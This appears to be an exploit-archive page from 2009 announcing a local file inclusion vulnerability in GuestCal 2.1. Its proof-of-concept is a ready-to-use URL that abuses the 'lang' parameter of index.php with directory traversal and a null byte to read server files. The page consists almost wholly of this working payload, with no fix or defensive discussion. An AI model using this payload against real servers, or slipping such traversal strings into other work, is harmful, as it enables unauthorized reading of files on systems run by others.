[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability
# Published : 2009-04-14
# Author : SirGod
# Previous Title : PHP-Revista 1.1.2 (RFI/SQLi/CB/XSS) Multiple Remote Vulnerabilities
# Next Title : Aqua CMS (username) SQL Injection Vulnerability


##################################################################################
[+] GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##################################################################################

[+] Download script : http://guestcal.com/de/download

[+] Local File Inclusion

 - PoC :

 http://127.0.0.1/index.php?year=2009&object=1&lang=../../../../../BOOTSECT.BAK%00

##################################################################################

# www.Syue.com [2009-04-14]